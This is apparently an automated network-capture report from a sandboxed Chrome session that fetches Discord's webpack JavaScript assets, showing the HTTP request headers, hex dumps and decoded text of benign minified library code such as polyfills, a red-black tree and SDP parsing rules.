                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 29 3b 21 6f 28 69 2e 69 6e 73 70 65 63 74 53 6f 75 72 63 65 29 26 26 28 69 2e 69 6e 73 70 65 63 74 53 6f 75 72 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 75 28 74 29 7d 29 2c 74 2e 65 78 70 6f 72 74 73 3d 69 2e 69 6e 73 70 65 63 74 53 6f 75 72 63 65 7d 2c 35 31 35 30 31 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 6f 2c 69 2c 75 3d 6e 28 22 32 32 37 34 35 32 22 29 2c 63 3d 6e 28 22 35 30 33 34 38 36 22 29 2c 73 3d 6e 28 22 34 37 32 39 36 30 22 29 2c 66 3d 6e 28 22 33 36 36 34 38 33 22 29 2c 61 3d 6e 28 22 35 39 33 39 33 22 29 2c 70 3d 6e 28 22 37 36 38 34 39 37 22 29 2c 6c 3d 6e 28 22 32 38 35 34 32 35 22 29 2c 76 3d 6e
                                                                          Data Ascii: unction.toString);!o(i.inspectSource)&&(i.inspectSource=function(t){return u(t)}),t.exports=i.inspectSource},515011:function(t,r,n){"use strict";var e,o,i,u=n("227452"),c=n("503486"),s=n("472960"),f=n("366483"),a=n("59393"),p=n("768497"),l=n("285425"),v=n
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 74 61 3d 7b 7d 2c 66 3d 75 2e 4e 41 54 49 56 45 3d 22 4e 22 2c 61 3d 75 2e 50 4f 4c 59 46 49 4c 4c 3d 22 50 22 3b 74 2e 65 78 70 6f 72 74 73 3d 75 7d 2c 35 35 31 35 34 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 7d 7d 2c 34 37 32 39 36 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 31 32 35 33 35 39 22 29 2c 6f 3d 6e 28 22 31 30 35 30 35 31 22 29 2c 69 3d 6f 2e 61 6c 6c 3b 74 2e 65 78 70 6f 72 74 73 3d 6f 2e 49 53 5f 48 54 4d 4c 44 44 41 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79
                                                                          Data Ascii: ta={},f=u.NATIVE="N",a=u.POLYFILL="P";t.exports=u},551544:function(t,r,n){"use strict";t.exports=function(t){return null==t}},472960:function(t,r,n){"use strict";var e=n("125359"),o=n("105051"),i=o.all;t.exports=o.IS_HTMLDDA?function(t){return"object"==ty
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 29 3b 74 72 79 7b 6e 26 26 75 28 6e 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 6e 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3f 63 26 26 79 28 74 2c 22 70 72 6f 74 6f 74 79 70 65 22 2c 7b 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 3a 74 2e 70 72 6f 74 6f 74 79 70 65 26 26 28 74 2e 70 72 6f 74 6f 74 79 70 65 3d 76 6f 69 64 20 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 65 3d 70 28 74 29 3b 72 65 74 75 72 6e 21 75 28 65 2c 22 73 6f 75 72 63 65 22 29 26 26 28 65 2e 73 6f 75 72 63 65 3d 67 28 6d 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 72 3f 72 3a 22 22 29 29 2c 74 7d 3b 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 26 26 6c
                                                                          Data Ascii: );try{n&&u(n,"constructor")&&n.constructor?c&&y(t,"prototype",{writable:!1}):t.prototype&&(t.prototype=void 0)}catch(t){}var e=p(t);return!u(e,"source")&&(e.source=g(m,"string"==typeof r?r:"")),t};Function.prototype.toString=d(function(){return i(this)&&l
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 39 38 32 34 38 35 22 29 2c 6f 3d 6e 28 22 39 37 38 34 33 37 22 29 2e 63 6f 6e 63 61 74 28 22 6c 65 6e 67 74 68 22 2c 22 70 72 6f 74 6f 74 79 70 65 22 29 3b 72 2e 66 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 28 74 2c 6f 29 7d 7d 2c 34 39 33 33 39 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 66 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 7d 2c 34 37 30 39 38 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 36 34 39 38 30 22 29 3b 74
                                                                          Data Ascii: e strict";var e=n("982485"),o=n("978437").concat("length","prototype");r.f=Object.getOwnPropertyNames||function(t){return e(t,o)}},493399:function(t,r,n){"use strict";r.f=Object.getOwnPropertySymbols},470984:function(t,r,n){"use strict";var e=n("64980");t
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 43 61 6e 27 74 20 63 61 6c 6c 20 6d 65 74 68 6f 64 20 6f 6e 20 22 2b 74 29 3b 72 65 74 75 72 6e 20 74 7d 7d 2c 32 38 35 34 32 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 31 37 37 35 38 22 29 2c 6f 3d 6e 28 22 33 31 39 37 37 38 22 29 2c 69 3d 65 28 22 6b 65 79 73 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 69 5b 74 5d 7c 7c 28 69 5b 74 5d 3d 6f 28 74 29 29 7d 7d 2c 37 36 38 34 39 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 35 30 33 34 38 36 22 29 2c 6f 3d 6e 28 22 38 36 31 38 35 30 22 29 2c 69 3d 22 5f 5f 63 6f 72 65 2d 6a 73 5f 73 68 61 72 65 64 5f 5f 22
                                                                          Data Ascii: Can't call method on "+t);return t}},285425:function(t,r,n){"use strict";var e=n("17758"),o=n("319778"),i=e("keys");t.exports=function(t){return i[t]||(i[t]=o(t))}},768497:function(t,r,n){"use strict";var e=n("503486"),o=n("861850"),i="__core-js_shared__"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          242192.168.2.549976162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/49554.34f5589cb37c5b3e60d3.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=W6_D4Wxsd09Iulxu8Obu7jWyxiMdtvIcsXvnOFB7Ydw-1702226710002-0-604800000
                                                                          2023-12-10 16:45:10 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 38 35 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 64 30 65 65 31 32 31 64 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 96858Connection: closeCF-Ray: 8336f4ed0ee121d9-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 39 35 35 34 22 5d 2c 7b 35 35 39 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 65 2e 65 78 70 6f 72 74 73 3d 7b 52 42 54 72 65 65 3a 72 28 22 37 36 38 36 36 31 22 29 2c 42 69 6e 54 72 65 65 3a 72 28 22 38 36 34 32 39 37 22 29 7d 7d 2c 38 36 34 32 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 22 37 38 37 39 38 22 29 3b 66 75 6e 63 74 69 6f 6e 20 4e 6f 64 65 28 65 29 7b 74 68 69 73 2e 64 61 74 61 3d 65 2c 74 68 69 73 2e 6c 65 66 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 72 69 67 68 74 3d 6e 75 6c 6c 7d
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["49554"],{55942:function(e,t,r){e.exports={RBTree:r("768661"),BinTree:r("864297")}},864297:function(e,t,r){var n=r("78798");function Node(e){this.data=e,this.left=null,this.right=null}
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 74 5f 63 68 69 6c 64 28 21 74 29 3b 72 65 74 75 72 6e 20 65 2e 73 65 74 5f 63 68 69 6c 64 28 21 74 2c 72 2e 67 65 74 5f 63 68 69 6c 64 28 74 29 29 2c 72 2e 73 65 74 5f 63 68 69 6c 64 28 74 2c 65 29 2c 65 2e 72 65 64 3d 21 30 2c 72 2e 72 65 64 3d 21 31 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 73 65 74 5f 63 68 69 6c 64 28 21 74 2c 73 28 65 2e 67 65 74 5f 63 68 69 6c 64 28 21 74 29 2c 21 74 29 29 2c 73 28 65 2c 74 29 7d 4e 6f 64 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 5f 63 68 69 6c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 74 68 69 73 2e 72 69 67 68 74 3a 74 68 69 73 2e 6c 65 66 74 7d 2c 4e 6f 64 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 5f 63 68 69 6c 64 3d 66 75 6e 63 74 69 6f
                                                                          Data Ascii: t_child(!t);return e.set_child(!t,r.get_child(t)),r.set_child(t,e),e.red=!0,r.red=!1,r}function a(e,t){return e.set_child(!t,s(e.get_child(!t),!t)),s(e,t)}Node.prototype.get_child=function(e){return e?this.right:this.left},Node.prototype.set_child=functio
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 28 6c 2e 67 65 74 5f 63 68 69 6c 64 28 21 75 29 29 26 26 69 2e 73 65 74 5f 63 68 69 6c 64 28 68 2c 73 28 6e 2c 75 29 29 3b 76 61 72 20 6d 3d 69 2e 67 65 74 5f 63 68 69 6c 64 28 68 29 3b 6d 2e 72 65 64 3d 21 30 2c 72 2e 72 65 64 3d 21 30 2c 6d 2e 6c 65 66 74 2e 72 65 64 3d 21 31 2c 6d 2e 72 69 67 68 74 2e 72 65 64 3d 21 31 7d 65 6c 73 65 20 6e 2e 72 65 64 3d 21 31 2c 6c 2e 72 65 64 3d 21 30 2c 72 2e 72 65 64 3d 21 30 7d 7d 7d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 63 26 26 28 63 2e 64 61 74 61 3d 72 2e 64 61 74 61 2c 6e 2e 73 65 74 5f 63 68 69 6c 64 28 6e 2e 72 69 67 68 74 3d 3d 3d 72 2c 72 2e 67 65 74 5f 63 68 69 6c 64 28 6e 75 6c 6c 3d 3d 3d 72 2e 6c 65 66 74 29 29 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 29 2c 74 68 69 73 2e 5f 72 6f 6f 74 3d 74 2e 72
                                                                          Data Ascii: (l.get_child(!u))&&i.set_child(h,s(n,u));var m=i.get_child(h);m.red=!0,r.red=!0,m.left.red=!1,m.right.red=!1}else n.red=!1,l.red=!0,r.red=!0}}}}return null!==c&&(c.data=r.data,n.set_child(n.right===r,r.get_child(null===r.left)),this.size--),this._root=t.r
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 75 6c 6c 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 65 2e 6c 65 66 74 3b 29 65 3d 65 2e 6c 65 66 74 3b 72 65 74 75 72 6e 20 65 2e 64 61 74 61 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 72 6f 6f 74 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 65 2e 72 69 67 68 74 3b 29 65 3d 65 2e 72 69 67 68 74 3b 72 65 74 75 72 6e 20 65 2e 64 61 74 61 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 69 74 65 72 61 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 69 28 74 68 69 73 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 65 61 63 68 3d 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: ull===e)return null;for(;null!==e.left;)e=e.left;return e.data},n.prototype.max=function(){var e=this._root;if(null===e)return null;for(;null!==e.right;)e=e.right;return e.data},n.prototype.iterator=function(){return new i(this)},n.prototype.each=function
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 63 75 72 73 6f 72 3d 65 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 6d 61 78 4e 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 65 2e 72 69 67 68 74 3b 29 74 68 69 73 2e 5f 61 6e 63 65 73 74 6f 72 73 2e 70 75 73 68 28 65 29 2c 65 3d 65 2e 72 69 67 68 74 3b 74 68 69 73 2e 5f 63 75 72 73 6f 72 3d 65 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 6e 7d 2c 36 37 37 39 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 65 3d 72 2e 6e 6d 64 28 65 29 2c 72 28 22 34 32 34 39 37 33 22 29 2c 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 61
                                                                          Data Ascii: cursor=e},i.prototype._maxNode=function(e){for(;null!==e.right;)this._ancestors.push(e),e=e.right;this._cursor=e},e.exports=n},677935:function(e,t,r){e=r.nmd(e),r("424973"),!function(){"use strict";var t={}.hasOwnProperty;function r(){for(var e=[],n=0;n<a
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 73 68 69 66 74 3a 31 36 2c 63 74 72 6c 3a 31 37 2c 61 6c 74 3a 31 38 2c 22 70 61 75 73 65 2f 62 72 65 61 6b 22 3a 31 39 2c 22 63 61 70 73 20 6c 6f 63 6b 22 3a 32 30 2c 65 73 63 3a 32 37 2c 73 70 61 63 65 3a 33 32 2c 22 70 61 67 65 20 75 70 22 3a 33 33 2c 22 70 61 67 65 20 64 6f 77 6e 22 3a 33 34 2c 65 6e 64 3a 33 35 2c 68 6f 6d 65 3a 33 36 2c 6c 65 66 74 3a 33 37 2c 75 70 3a 33 38 2c 72 69 67 68 74 3a 33 39 2c 64 6f 77 6e 3a 34 30 2c 69 6e 73 65 72 74 3a 34 35 2c 64 65 6c 65 74 65 3a 34 36 2c 63 6f 6d 6d 61 6e 64 3a 39 31 2c 22 6c 65 66 74 20 63 6f 6d 6d 61 6e 64 22 3a 39 31 2c 22 72 69 67 68 74 20 63 6f 6d 6d 61 6e 64 22 3a 39 33 2c 22 6e 75 6d 70 61 64 20 2a 22 3a 31 30 36 2c 22 6e 75 6d 70 61 64 20 2b 22 3a 31 30 37 2c 22 6e 75 6d 70 61 64 20 2d 22 3a
                                                                          Data Ascii: shift:16,ctrl:17,alt:18,"pause/break":19,"caps lock":20,esc:27,space:32,"page up":33,"page down":34,end:35,home:36,left:37,up:38,right:39,down:40,insert:45,delete:46,command:91,"left command":91,"right command":93,"numpad *":106,"numpad +":107,"numpad -":
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 22 76 65 72 73 69 6f 6e 22 2c 72 65 67 3a 2f 5e 28 5c 64 2a 29 24 2f 7d 5d 2c 6f 3a 5b 7b 6e 61 6d 65 3a 22 6f 72 69 67 69 6e 22 2c 72 65 67 3a 2f 5e 28 5c 53 2a 29 20 28 5c 64 2a 29 20 28 5c 64 2a 29 20 28 5c 53 2a 29 20 49 50 28 5c 64 29 20 28 5c 53 2a 29 2f 2c 6e 61 6d 65 73 3a 5b 22 75 73 65 72 6e 61 6d 65 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 2c 22 73 65 73 73 69 6f 6e 56 65 72 73 69 6f 6e 22 2c 22 6e 65 74 54 79 70 65 22 2c 22 69 70 56 65 72 22 2c 22 61 64 64 72 65 73 73 22 5d 2c 66 6f 72 6d 61 74 3a 22 25 73 20 25 73 20 25 64 20 25 73 20 49 50 25 64 20 25 73 22 7d 5d 2c 73 3a 5b 7b 6e 61 6d 65 3a 22 6e 61 6d 65 22 7d 5d 2c 69 3a 5b 7b 6e 61 6d 65 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 7d 5d 2c 75 3a 5b 7b 6e 61 6d 65 3a 22 75 72 69 22 7d 5d 2c
                                                                          Data Ascii: "version",reg:/^(\d*)$/}],o:[{name:"origin",reg:/^(\S*) (\d*) (\d*) (\S*) IP(\d) (\S*)/,names:["username","sessionId","sessionVersion","netType","ipVer","address"],format:"%s %s %d %s IP%d %s"}],s:[{name:"name"}],i:[{name:"description"}],u:[{name:"uri"}],
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 3a 22 72 74 63 70 46 62 22 2c 72 65 67 3a 2f 5e 72 74 63 70 2d 66 62 3a 28 5c 2a 7c 5c 64 2a 29 20 28 5b 5c 77 2d 5f 5d 2a 29 28 3f 3a 20 28 5b 5c 77 2d 5f 5d 2a 29 29 3f 2f 2c 6e 61 6d 65 73 3a 5b 22 70 61 79 6c 6f 61 64 22 2c 22 74 79 70 65 22 2c 22 73 75 62 74 79 70 65 22 5d 2c 66 6f 72 6d 61 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 2e 73 75 62 74 79 70 65 3f 22 72 74 63 70 2d 66 62 3a 25 73 20 25 73 20 25 73 22 3a 22 72 74 63 70 2d 66 62 3a 25 73 20 25 73 22 7d 7d 2c 7b 70 75 73 68 3a 22 65 78 74 22 2c 72 65 67 3a 2f 5e 65 78 74 6d 61 70 3a 28 5c 64 2b 29 28 3f 3a 5c 2f 28 5c 77 2b 29 29 3f 20 28 5c 53 2a 29 28 3f 3a 20 28 5c 53 2a 29 29 3f 2f 2c 6e 61 6d 65 73 3a 5b 22 76 61 6c 75 65 22 2c 22 64 69 72 65 63
                                                                          Data Ascii: :"rtcpFb",reg:/^rtcp-fb:(\*|\d*) ([\w-_]*)(?: ([\w-_]*))?/,names:["payload","type","subtype"],format:function(e){return null!=e.subtype?"rtcp-fb:%s %s %s":"rtcp-fb:%s %s"}},{push:"ext",reg:/^extmap:(\d+)(?:\/(\w+))? (\S*)(?: (\S*))?/,names:["value","direc
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6e 65 6e 74 22 2c 22 74 72 61 6e 73 70 6f 72 74 22 2c 22 70 72 69 6f 72 69 74 79 22 2c 22 69 70 22 2c 22 70 6f 72 74 22 2c 22 74 79 70 65 22 2c 22 72 61 64 64 72 22 2c 22 72 70 6f 72 74 22 2c 22 74 63 70 74 79 70 65 22 2c 22 67 65 6e 65 72 61 74 69 6f 6e 22 2c 22 6e 65 74 77 6f 72 6b 2d 69 64 22 2c 22 6e 65 74 77 6f 72 6b 2d 63 6f 73 74 22 5d 2c 66 6f 72 6d 61 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 63 61 6e 64 69 64 61 74 65 3a 25 73 20 25 64 20 25 73 20 25 64 20 25 73 20 25 64 20 74 79 70 20 25 73 22 3b 72 65 74 75 72 6e 20 74 2b 3d 28 6e 75 6c 6c 21 3d 65 2e 72 61 64 64 72 3f 22 20 72 61 64 64 72 20 25 73 20 72 70 6f 72 74 20 25 64 22 3a 22 25 76 25 76 22 29 2b 28 6e 75 6c 6c 21 3d 65 2e 74 63 70 74 79 70 65 3f 22 20 74 63 70 74
                                                                          Data Ascii: nent","transport","priority","ip","port","type","raddr","rport","tcptype","generation","network-id","network-cost"],format:function(e){var t="candidate:%s %d %s %d %s %d typ %s";return t+=(null!=e.raddr?" raddr %s rport %d":"%v%v")+(null!=e.tcptype?" tcpt


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          243192.168.2.549977162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/69288.312b5f484a6756663ca9.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=lOSGVmnCqYZ0_GjH00L_Li4AJCc.ccsJtoqTjSV1Ef4-1702226710006-0-604800000
                                                                          2023-12-10 16:45:10 UTC972INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 34 39 36 38 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 64 30 64 36 63 37 34 33 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 849684Connection: closeCF-Ray: 8336f4ed0d6c743e-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:10 UTC397INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 39 32 38 38 22 5d 2c 7b 34 37 37 38 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 3d 6e 2e 6e 6d 64 28 65 29 2c 6e 28 22 37 38 31 37 33 38 22 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 6e 2e 68 75 6d 61 6e 69 7a 65 2c 6f 3d 7b 7d 3b 76 6f 69 64 20 30 21 3d 3d 74 3f 28 76 6f 69 64 20 30 21 3d 3d 65 26 26 65 2e 65 78 70 6f 72 74 73 26 26 28 74 3d 65 2e 65 78 70 6f 72 74 73 3d 6f 29 2c 74 2e 68 75 6d 61 6e 69 7a 65 3d 6f 29 3a 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["69288"],{477850:function(e,t,n){e=n.nmd(e),n("781738"),(function(){var n=this,r=n.humanize,o={};void 0!==t?(void 0!==e&&e.exports&&(t=e.exports=o),t.humanize=o):("function"==typeof de
